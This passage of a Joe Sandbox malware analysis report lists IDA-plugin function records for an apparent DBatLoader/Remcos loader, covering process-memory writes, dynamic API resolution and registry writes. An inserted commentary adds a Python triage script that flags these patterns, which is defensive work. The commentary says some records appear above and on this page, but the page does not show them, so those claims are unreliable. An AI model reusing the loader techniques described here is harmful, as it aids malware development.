                                                                              • Part of subcall function 0288A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0288C3D9,00000000,0288C433), ref: 0288A797
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                            • String ID:
                                                                            • API String ID: 503785936-0
                                                                            • Opcode ID: 503b54062240cade9eaeb78735991118cd60eb912fdb3cf9f887bb9a9eb7bff3
                                                                            • Instruction ID: 89db2a42be33b51a8068313a85907bc3ec6ac731b6462d06ad59c9e413d1bdb8
                                                                            • Opcode Fuzzy Hash: 503b54062240cade9eaeb78735991118cd60eb912fdb3cf9f887bb9a9eb7bff3
                                                                            • Instruction Fuzzy Hash: 5131807CA006099FDB01FFACC881B9EB7F6AB48700F944065E504EB390E7795E048FA2
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,029FBA58), ref: 0289F258
                                                                            • RegSetValueExA.ADVAPI32(00000BE4,00000000,00000000,00000001,00000000,0000001C,00000000,0289F2C3), ref: 0289F290
                                                                            • RegCloseKey.ADVAPI32(00000BE4,00000BE4,00000000,00000000,00000001,00000000,0000001C,00000000,0289F2C3), ref: 0289F29B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenValue
                                                                            • String ID:
                                                                            • API String ID: 779948276-0
                                                                            • Opcode ID: 7a4a48c2124d0558dc4a7bc889a33e55b6007d79c196d777439a8056e5d68a05
                                                                            • Instruction ID: 0b70b02decf0d531184c8f45d885ff34f2d18e18cbafcd0100d28163e3ca1269
                                                                            • Opcode Fuzzy Hash: 7a4a48c2124d0558dc4a7bc889a33e55b6007d79c196d777439a8056e5d68a05
                                                                            • Instruction Fuzzy Hash: C411FB7E644205AFEB50FFA8DC91E9D7BEDEB08700B4044A1B604D7650EB30EE408F55
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,029FBA58), ref: 0289F258
                                                                            • RegSetValueExA.ADVAPI32(00000BE4,00000000,00000000,00000001,00000000,0000001C,00000000,0289F2C3), ref: 0289F290
                                                                            • RegCloseKey.ADVAPI32(00000BE4,00000BE4,00000000,00000000,00000001,00000000,0000001C,00000000,0289F2C3), ref: 0289F29B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenValue
                                                                            • String ID:
                                                                            • API String ID: 779948276-0
                                                                            • Opcode ID: 00c8e185fd996d0d30027889b3b905bff0149a619d4f97fab26d852795d68e06
                                                                            • Instruction ID: 62588c0e58a1b0a1a88f33a4860064cfc98a219df23cdfba7ff9e8b73311ed60
                                                                            • Opcode Fuzzy Hash: 00c8e185fd996d0d30027889b3b905bff0149a619d4f97fab26d852795d68e06
                                                                            • Instruction Fuzzy Hash: 4E110D7E644205AFDB50FFA8DC91E9D7BEDEB08700B4044A1B604D7650EB30EE408F55
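The three records above that pair GetModuleHandle/GetProcAddress subcalls with the strings Kernel32, CreateProcessAsUserW and WinExec show the loader resolving process-creation APIs by name at run time instead of importing them, and the two RegOpenKeyA/RegSetValueExA records show a registry value being written. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses function records written in the report's own "APIs / Similarity" text layout and flags those two patterns so they can be pulled out of a long listing. The embedded SAMPLE_RECORDS text is a constructed, trimmed copy of five records from this page; the watch lists PROCESS_EXEC_APIS, RESOLVERS and REG_WRITERS are the author's assumptions and not report fields.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag two patterns.

Added example, not part of the report. The record layout is taken from the
page; the watch lists below are assumptions chosen for this illustration.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: five records copied from this page in the report's own
# layout, trimmed to the lines the parser needs (indentation is irrelevant).
SAMPLE_RECORDS = """\
APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0289E5F6
Strings
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• Opcode ID: 643d1f16b219a1c076c1d2d184a227f04de0351d40a6cb413758429fa47a2ef0
APIs
  • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000), ref: 0289820A
  • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000), ref: 028982C1
  • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02898814
Strings
Similarity
• API ID: HandleModule$AddressProc$CreateProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• Opcode ID: eebe99d9c638d123fd204e8677ff9d02bb100413c7cd47ee26b035a42e5d65ad
APIs
  • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
• WinExec.KERNEL32(?,?), ref: 02898624
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• Opcode ID: 4b62fab746f1aaff07f5088ce48fa00819a19f1cd257d122386b15b28d58f5e8
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 02895C88
• GetLastError.KERNEL32(00000000,02895D74,?,?,02893900,00000001), ref: 02895D1B
Similarity
• API ID: CreateErrorFileLast$FormatFullMessageNamePath
• String ID:
• Opcode ID: 503b54062240cade9eaeb78735991118cd60eb912fdb3cf9f887bb9a9eb7bff3
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,029FBA58), ref: 0289F258
• RegSetValueExA.ADVAPI32(00000BE4,00000000,00000000,00000001,00000000,0000001C,00000000,0289F2C3), ref: 0289F290
• RegCloseKey.ADVAPI32(00000BE4,00000BE4,00000000), ref: 0289F29B
Similarity
• API ID: CloseOpenValue
• String ID:
• Opcode ID: 7a4a48c2124d0558dc4a7bc889a33e55b6007d79c196d777439a8056e5d68a05
"""

# One API line: optional "Part of subcall function <addr>:" prefix, then Name.MODULE(
API_CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?([A-Za-z0-9_]+)\.([A-Za-z0-9]+)\("
)
# Similarity fields we keep; everything else in a record is ignored.
FIELD_RE = re.compile(r"•\s*(API ID|String ID|API String ID|Opcode ID):\s*(.*)$")

# Assumed watch lists (not report fields): APIs whose *name as a string* next to a
# resolver is the tell, resolvers, and registry write calls.
PROCESS_EXEC_APIS = {"CreateProcessA", "CreateProcessW", "CreateProcessAsUserA",
                     "CreateProcessAsUserW", "WinExec", "ShellExecuteA", "ShellExecuteW",
                     "ShellExecuteExA", "ShellExecuteExW"}
RESOLVERS = {"GetProcAddress", "LdrGetProcedureAddress"}
REG_WRITERS = {"RegSetValueExA", "RegSetValueExW", "RegSetValueA", "RegSetValueW"}


@dataclass
class FunctionRecord:
    direct_apis: list = field(default_factory=list)   # APIs the function calls itself
    subcall_apis: list = field(default_factory=list)  # APIs reached through subcalls
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""

    @property
    def all_apis(self):
        return self.direct_apis + self.subcall_apis

    @property
    def strings(self):
        # "String ID" is a '$'-joined list of the strings referenced by the function.
        return [s for s in self.string_id.split("$") if s]


@dataclass
class Finding:
    opcode_id: str
    category: str
    detail: str


def parse_records(text):
    """Split the listing into records; a bare 'APIs' line starts a new one."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            if key == "API ID":
                current.api_id = value
            elif key == "String ID":
                current.string_id = value
            elif key == "Opcode ID":
                current.opcode_id = value
            continue
        m = API_CALL_RE.match(line)
        if m:
            caller, name, _module = m.groups()
            (current.subcall_apis if caller else current.direct_apis).append(name)
    return records


def flag_records(records):
    """Flag by-name resolution of process-creation APIs and registry writes."""
    findings = []
    for rec in records:
        apis = set(rec.all_apis)
        if apis & RESOLVERS:
            named = sorted(s for s in rec.strings if s in PROCESS_EXEC_APIS)
            if named:
                findings.append(Finding(rec.opcode_id, "dynamic_api_resolution",
                                        "resolves " + ", ".join(named) + " by name"))
        written = sorted(apis & REG_WRITERS)
        if written:
            findings.append(Finding(rec.opcode_id, "registry_write",
                                    "writes via " + ", ".join(written)))
    return findings


def analyze(text):
    return flag_records(parse_records(text))


if __name__ == "__main__":
    for f in analyze(SAMPLE_RECORDS):
        print(f"{f.category:24} {f.opcode_id[:16]}  {f.detail}")
```

The flag is structural: it only says that a resolver call and a process-creation API name occur in the same function record, which is what the three records on this page show, not that the string was proven to be the GetProcAddress argument. The report's own verdict (DBatLoader, Remcos) rests on its signatures and YARA hits, so treat the script as a triage filter over a long function listing rather than a replacement for them.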
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: c4c621c3e4b0de812496ca9300d933a0fdb032cb38527023cac3ce1502893fe5
                                                                            • Instruction ID: 17d53f446fbaa202aa8a1ddfc69f20b46dd4c42efbc171f110c48e6fcb55c98d
                                                                            • Opcode Fuzzy Hash: c4c621c3e4b0de812496ca9300d933a0fdb032cb38527023cac3ce1502893fe5
                                                                            • Instruction Fuzzy Hash: 28F0CD2C708108EB8B247B3D8DC46AE279A6F403447585876F44ADB20ADB64DC45CB63
                                                                            APIs
                                                                            • SysFreeString.OLEAUT32(0289F4A4), ref: 02884C6E
                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 02884D5B
                                                                            • SysFreeString.OLEAUT32(00000000), ref: 02884D6D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: String$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 986138563-0
                                                                            • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                            • Instruction ID: 5b64f6d047145535a535fa99628d10a8a584e9caa8db9911ece94a5cf42eb037
                                                                            • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                            • Instruction Fuzzy Hash: CDE0C2BD2012065EFF04BF258C44B37332FAFC1751F248098E904CA014EB38E401AE3A
                                                                            APIs
                                                                            • SysFreeString.OLEAUT32(?), ref: 028973DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: H
                                                                            • API String ID: 3341692771-2852464175
                                                                            • Opcode ID: 8859160e275032553d72f5c59d1d66eb7540fb6e38b80618c6615699d5cddd58
                                                                            • Instruction ID: 5e3bc8b97af796ead7fe21a3c2a1d170582975e0681ec45c985315cd4c5ca200
                                                                            • Opcode Fuzzy Hash: 8859160e275032553d72f5c59d1d66eb7540fb6e38b80618c6615699d5cddd58
                                                                            • Instruction Fuzzy Hash: B0B1C2B8A216089FDB15CF99D480A9DFBF2FF89314F588169E849EB364D730A845CF50
                                                                            APIs
                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 0288E781
                                                                              • Part of subcall function 0288E364: VariantClear.OLEAUT32(?), ref: 0288E373
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCopy
                                                                            • String ID:
                                                                            • API String ID: 274517740-0
                                                                            • Opcode ID: 8998193ecf74e457fd06eb230fa05c1bff443327be0c38eb40e88f64abf7c51f
                                                                            • Instruction ID: 20391069085e1a5b0aab78c3346cf535118c7593e52aaae23df8771f30fa590f
                                                                            • Opcode Fuzzy Hash: 8998193ecf74e457fd06eb230fa05c1bff443327be0c38eb40e88f64abf7c51f
                                                                            • Instruction Fuzzy Hash: 3F118E2C7102149BDB34BF2DC8C4A6A77DAEF85750B108466F55ECB619EB30DC44CA62
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: InitVariant
                                                                            • String ID:
                                                                            • API String ID: 1927566239-0
                                                                            • Opcode ID: f80b3f8b2d9dac4bbf2bae05c891c8d66a1c449cf597969af1fc5579623f703c
                                                                            • Instruction ID: 1a47a8480dfb15510878aceb7b10f99e87910e88983f40101386de2858b833aa
                                                                            • Opcode Fuzzy Hash: f80b3f8b2d9dac4bbf2bae05c891c8d66a1c449cf597969af1fc5579623f703c
                                                                            • Instruction Fuzzy Hash: D5314C7DA00A09ABDB10FEACD884AAA77E8EB0D314F548465F90DD3250D334E950CBA1
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                              • Part of subcall function 02898338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,028983C2), ref: 028983A4
                                                                            • FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                            • String ID:
                                                                            • API String ID: 1478290883-0
                                                                            • Opcode ID: 4e272868a6c78af90353306215629664486d5475de667486db2a847e271fb06b
                                                                            • Instruction ID: c9fe3bdb276cd312d7049b87f763f8615776d15c2ba62027a1779506b4007691
                                                                            • Opcode Fuzzy Hash: 4e272868a6c78af90353306215629664486d5475de667486db2a847e271fb06b
                                                                            • Instruction Fuzzy Hash: 5F2142BD780305AFFB50FBECEC42B9EB79A9B45710F5414A0B504E72D0E674B9108A2A
                                                                            APIs
                                                                            • CLSIDFromProgID.OLE32(00000000,?,00000000,02896DB9,?,?,?,00000000), ref: 02896D99
                                                                              • Part of subcall function 02884C60: SysFreeString.OLEAUT32(0289F4A4), ref: 02884C6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgString
                                                                            • String ID:
                                                                            • API String ID: 4225568880-0
                                                                            • Opcode ID: 8618ed320ea088f7b47d16febafcee0f0e7d1564c73b73b2d375576e79b6fd17
                                                                            • Instruction ID: c0a1b5c507078d937437ca0b09adacddae278ed81b98e1adfdb369a0ed7c6870
                                                                            • Opcode Fuzzy Hash: 8618ed320ea088f7b47d16febafcee0f0e7d1564c73b73b2d375576e79b6fd17
                                                                            • Instruction Fuzzy Hash: 82E0E53E2002187BE711FB6EDC41D5E77ADDF8A740B5144B1E500D3600F93A7D008861
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(02880000,?,00000105), ref: 02885886
                                                                              • Part of subcall function 02885ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02880000,028AE790), ref: 02885AE8
                                                                              • Part of subcall function 02885ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02880000,028AE790), ref: 02885B06
                                                                              • Part of subcall function 02885ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02880000,028AE790), ref: 02885B24
                                                                              • Part of subcall function 02885ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02885B42
                                                                              • Part of subcall function 02885ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02885BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02885B8B
                                                                              • Part of subcall function 02885ACC: RegQueryValueExA.ADVAPI32(?,02885D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02885BD1,?,80000001), ref: 02885BA9
                                                                              • Part of subcall function 02885ACC: RegCloseKey.ADVAPI32(?,02885BD8,00000000,?,?,00000000,02885BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885BCB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                            • String ID:
                                                                            • API String ID: 2796650324-0
                                                                            • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                            • Instruction ID: 5252dca8d586985b1fc3ee4974d7c83760b9c5b8eb4f52cc747e2c7db419b688
                                                                            • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                            • Instruction Fuzzy Hash: F7E06D79A003148FCB10EE9CC9C0B5737D8AB08750F450961EC58CF246D7B4D9208BD2
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02887DF4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                            • Instruction ID: b65c79ccc8a18fe64f458fe71f3911ce798e5b231f999995c12a11e944d1fc81
                                                                            • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                            • Instruction Fuzzy Hash: 58D05BBA3091517AE224B65E5D44EA75BDCDBC6770F10473DF558C7180D7208C01C6B1
                                                                            APIs
                                                                              • Part of subcall function 0289AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0289ADA3,?,?,0289AE35,00000000,0289AF11), ref: 0289AB30
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0289AB48
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0289AB5A
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0289AB6C
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0289AB7E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0289AB90
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0289ABA2
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0289ABB4
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0289ABC6
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0289ABD8
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0289ABEA
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0289ABFC
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0289AC0E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0289AC20
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0289AC32
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0289AC44
